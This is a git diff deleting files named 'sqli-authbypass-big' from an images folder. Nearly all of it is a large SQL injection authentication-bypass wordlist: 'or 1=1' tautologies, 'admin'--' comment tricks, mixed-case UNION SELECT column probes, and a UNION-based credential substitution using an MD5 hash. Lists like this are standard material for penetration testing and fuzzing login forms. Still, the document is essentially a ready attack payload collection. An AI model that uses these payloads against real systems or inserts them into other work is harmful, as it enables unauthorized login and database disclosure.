-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
